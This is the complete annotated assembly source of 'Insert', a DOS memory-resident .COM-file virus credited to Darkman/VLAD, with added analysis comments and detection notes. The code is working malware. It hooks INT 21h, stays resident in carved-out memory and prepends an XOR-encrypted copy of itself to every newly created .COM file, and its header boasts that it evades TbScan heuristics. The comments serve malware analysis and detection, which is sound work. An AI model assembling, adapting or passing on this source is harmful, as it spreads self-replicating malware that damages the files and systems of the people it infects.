; Darkman/VLAD
; Proudly Presents
; I N S E R T
; - No flags with TbScan v 6.30 high heuristic -
; Assembler notes: MASM/TASM-style Intel syntax, 16-bit real-mode DOS .COM image.
; The image is assembled at origin 0 (not the usual 100h); wherever a run-time
; offset inside the running program is needed the code adds psp+ to the label,
; while the resident high copy is placed at offset 0 of its own segment and
; therefore uses the bare org-0 offsets.
psp equ 100h ; .COM images load at CS:100h; psp+label = run-time offset in the loaded program
insert segment
assume cs:insert,ds:insert,es:insert ; single tiny-model segment: CS=DS=ES at .COM entry
org 00h ; Origin of COM-file: assembled at 0, rebased with psp+ (see above)
;-----------------------------------------------------------------------
; code - entry point of an infected .COM file (and of the carrier itself).
; Analysis: installer, then hand-off to the host program.
;   1. decrypt the body in place (crypt..cryptend, see xorcrypt)
;   2. ask a resident copy whether it is installed (AX=6302h INT 21h;
;      virusint21 answers by echoing AX into BX)
;   3. if not installed: shrink this program's memory block, copy the
;      image into the freed paragraphs above it and point the INT 21h
;      vector at virusint21 in that copy
;   4. relocate the restore stub to the top of the segment and jump to it;
;      it moves the host back to PSP:100h and runs it
; Observable side effects of a fresh install (relevant for detection):
;   - the program's MCB (signature 'Z', last in chain) has its size
;     lowered by 2x the image size, and PSP:02h (top of memory) likewise
;   - the INT 21h vector at 0000:0084h is redirected to a segment just
;     above the program's allocation
; Register use: AX = MCB arithmetic / stub address, ES = high segment,
;   SI/DI/CX = rep movsb operands. Nothing is preserved for the host.
;-----------------------------------------------------------------------
code:
lea di,psp+crypt ; DI = run-time offset of crypt (psp+ rebases the org-0 label)
call xorcrypt ; decrypt crypt..cryptend in place before executing it
crypt:
mov ax,6302h ; residency probe; the resident handler replies with BX=AX
int 21h ; Do it!
cmp ax,bx ; did the resident copy echo AX into BX?
je virusexit ; already resident: skip install, restore the host
push ds ; Save DS (PSP segment) at stack
mov ax,ds ; AX = PSP segment
dec ax ; AX = PSP segment - 1
mov ds,ax ; DS = the program's memory control block (MCB precedes the PSP)
cmp byte ptr ds:[00h],'Z' ; MCB signature 'Z' = last block in the chain
jne insexit ; not last: cannot carve memory above us, give up installing
sub word ptr ds:[03h],(02h*(codeend-code)+0fh)/10h ; MCB size -= 2x image size in paragraphs (2x: infectfile stages a copy at codeend)
sub word ptr ds:[12h],(02h*(codeend-code)+0fh)/10h ; MCB:12h = PSP:02h (top-of-memory segment), lowered by the same amount
add ax,ds:[03h] ; AX = MCB segment + shrunken block size
inc ax ; AX = first paragraph of the freed region above the program
pop ds ; Load DS from stack
cld ; forward string moves for the copies below
push es ; Save ES at stack
mov es,ax ; ES = destination segment for the resident copy
mov cx,(codeend-code) ; CX = length of the image (author's note: 271 bytes)
xor di,di ; ES:0 = destination; the image is assembled at org 0
lea si,psp+code ; SI = offset of code in the running program
rep movsb ; copy the image into the freed high memory
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of the interrupt vector table
lea di,int21adr ; ES:DI = int21adr inside the high copy (org-0 offset, no psp+)
mov si,(21h*04h) ; DS:SI = INT 21h vector (0000:0084h)
movsw ; save the original INT 21h vector into the high copy's int21adr \
movsw ; (offset word, then segment word) /
mov word ptr ds:[21h*04h],offset virusint21 ; vector offset -> virusint21 in the high copy
mov ds:[21h*04h+02h],es ; vector segment -> high copy; INT 21h is now hooked
pop es ; Load ES from stack (PSP segment)
push es ; re-push so that insexit's pop ds also yields the PSP segment
insexit:
pop ds ; DS = PSP segment (from push ds above, or from the re-pushed ES)
virusexit:
mov ax,65535-(restoreend-restore) ; AX = top of the 64 KiB segment minus the stub size
mov cx,(restoreend-restore) ; CX = size of the restore stub
mov di,ax ; DI = destination: the stub goes to the very end of the segment
lea si,psp+restore ; SI = offset of restore in the running program
rep movsb ; relocate the stub out of the way of the host's bytes
jmp ax ; run the stub; it moves the host to PSP:100h and jumps there
virusint21 proc near ; INT 21h handler installed by code; runs from the high copy
;-----------------------------------------------------------------------
; Analysis: filters three requests and passes everything else to the saved
; original vector through a far jump whose operand is the int21adr dword.
;   AH=3Ch (create file) / AH=5Bh (create new file): call the original
;     handler; if the returned handle refers to a .COM file, write the
;     image as the first bytes of the still-empty file, so the creator's
;     own writes land after it (prepend / "insert" infection).
;   AX=6302h: residency probe, answered with BX=AX.
; Detection notes: the INT 21h vector (0000:0084h) pointing above the MCB
;   chain; INT 2Fh AX=1220h/1216h (SFT lookup) issued from inside a create
;   call; newly created .COM files whose first bytes are this image.
; Register use on the infect path: BX = handle, ES:DI = JFT entry, then
;   SFT entry; DS=ES=CS while staging and writing. Modified registers are
;   saved/restored; AX and flags returned to the caller are those of the
;   original handler.
;-----------------------------------------------------------------------
pushf ; Save flags at stack
cmp ah,3ch ; Create a file?
je infectfile ; Equal? Jump to infectfile
cmp ah,5bh ; Create new file?
je infectfile ; Equal? Jump to infectfile
cmp ax,6302h ; residency probe?
je insservice ; Equal? Jump to insservice
popf ; Load flags from stack
jumpfar db 0eah ; opcode of jmp far ptr; its seg:off operand is the dword that follows
int21adr dd ? ; saved original INT 21h vector (filled in by code); doubles as the jmp target
insservice:
mov bx,ax ; BX = AX: the reply that code tests with cmp ax,bx
popf ; Load flags from stack
iret ; Interrupt return!
infectfile:
call dword ptr cs:int21adr ; emulate INT (flags already pushed): far-call the original create
pushf ; keep the original handler's result flags
jc createerror ; create failed: return its error unchanged
push ax ; Save AX (new handle) at stack
push bx ; Save BX at stack
push di ; Save DI at stack
push es ; Save ES at stack
xchg ax,bx ; BX = file handle
mov ax,1220h ; INT 2Fh 1220h: get JFT entry address for handle BX
int 2fh ; -> ES:DI = pointer to the handle's SFT number
push bx ; Save BX (handle) at stack
mov ax,1216h ; INT 2Fh 1216h: get SFT entry address for SFT number BL
mov bl,es:[di] ; BL = SFT number of the handle
int 2fh ; -> ES:DI = SFT entry
pop bx ; Load BX (handle) from stack
cmp word ptr es:[di+28h],'OC' ; SFT name field, extension bytes 'C','O' (little-endian word) ...
jne exterror ; Not equal? Jump to exterror
cmp byte ptr es:[di+2ah],'M' ; ... and 'M': only .COM files are touched
jne exterror ; Not equal? Jump to exterror
push cx ; Save CX at stack
push dx ; Save DX at stack
push si ; Save SI at stack
push ds ; Save DS at stack
push cs ; Save CS at stack
pop ds ; DS = CS (the high copy)
push cs ; Save CS at stack
pop es ; ES = CS
in ax,40h ; read 16 bits from the PIT counter port 40h: per-infection XOR key
mov cryptvalues,ax ; patch the key into the xor immediate inside xorcrypt
mov cx,(codeend-code) ; CX = length of the image (author's note: 271 bytes)
lea di,codeend ; DI = staging area directly after the resident image (2nd half of the 2x reservation)
lea si,code ; SI = offset of code
rep movsb ; make a working copy of the image at codeend
lea di,codeend+06h ; DI = crypt label within the staged copy (author's offset; presumably crypt-code)
call xorcrypt ; encrypt the staged copy from its crypt label with the fresh key
mov ah,40h ; Write to file
mov cx,(codeend-code) ; write the whole image (author's note: 271 bytes)
lea dx,codeend ; DS:DX = staged, encrypted copy
int 21h ; the file was just created and is empty, so this lands at offset 0
pop ds ; Load DS from stack
pop si ; Load SI from stack
pop dx ; Load DX from stack
pop cx ; Load CX from stack
exterror:
pop es ; Load ES from stack
pop di ; Load DI from stack
pop bx ; Load BX from stack
pop ax ; Load AX (handle) from stack
createerror:
popf ; flags = result of the original handler
retf 02h ; far return, dropping the flags word pushed by INT so the handler's flags survive
endp
restore proc near ; host-recovery stub; executed from the top of the segment where code relocated it
;-----------------------------------------------------------------------
; Analysis: the host's original bytes follow the image in the file, so at
; run time they start at psp+codeend. Slide them down to PSP:100h
; (psp+code), overwriting the virus, and jump there. CX covers everything
; from psp+codeend up to the relocated stub. Destination lies below source,
; so the overlapping forward copy is well-defined. The host starts with
; AX, SI, DI and CX as left by this stub, not the DOS entry defaults.
;-----------------------------------------------------------------------
lea ax,psp+code ; AX = PSP:100h, where the host must live
mov di,ax ; DI = destination (start of the image)
lea si,psp+codeend ; SI = where the host's bytes currently start
mov cx,(65535-psp-(restoreend-restore))-(codeend-code) ; CX = bytes from psp+codeend up to the stub
rep movsb ; slide the host down over the virus
jmp ax ; run the host from PSP:100h
endp
restoreend: ; end of the relocated stub (restoreend-restore = its size)
; Analysis: both strings sit inside crypt..cryptend, so on disk they are
; XOR-obscured with the per-file key; after the decrypt at entry (and in
; the resident copy) they are in clear and usable as a memory signature.
virusname db ' [Insert]' ; Name of the virus
virusauthor db ' [Darkman/VLAD] ' ; Author of the virus
cryptend: ; end of the encrypted region
xorcrypt proc near ; symmetric XOR transform of crypt..cryptend, one 16-bit word at a time
;-----------------------------------------------------------------------
; In:    DI = offset of the first word to transform (the crypt label of the
;        running image at entry, or of the staged copy in infectfile)
; Key:   cryptvalues, the imm16 of the hand-encoded xor below; infectfile
;        overwrites it with a value read from port 40h before encrypting
; Out:   region transformed in place; CX = 0; DI past the last word
; Clobb: CX, DI, flags
; Note:  the xor is emitted as raw bytes (81 35 imm16) so that the key is
;        addressable data inside an instruction - self-modifying code.
;        Length is (cryptend-crypt)/2 words; an odd trailing byte would be
;        left untouched.
;-----------------------------------------------------------------------
mov cx,(cryptend-crypt)/02h ; CX = number of words to transform
cryptcode:
xorwordptr db 81h,35h ; encoding of xor word ptr [di],imm16 \
cryptvalues dw ? ; ... its imm16 operand: the key /
inc di ; advance DI to the next word \
inc di ; (two byte increments = +2) /
loop cryptcode ; repeat CX times
ret ; Return!
endp
codeend: ; end of the image; from here on the file holds the host program
; Analysis: in the carrier the "host" is just an exit, so running the plain
; assembled file only installs the resident copy. In an infected file the
; original program's bytes start here and restore moves them to PSP:100h.
int 20h ; Exit to DOS! (the carrier's stand-in host)
insert ends
end code ; entry point = code (PSP:100h)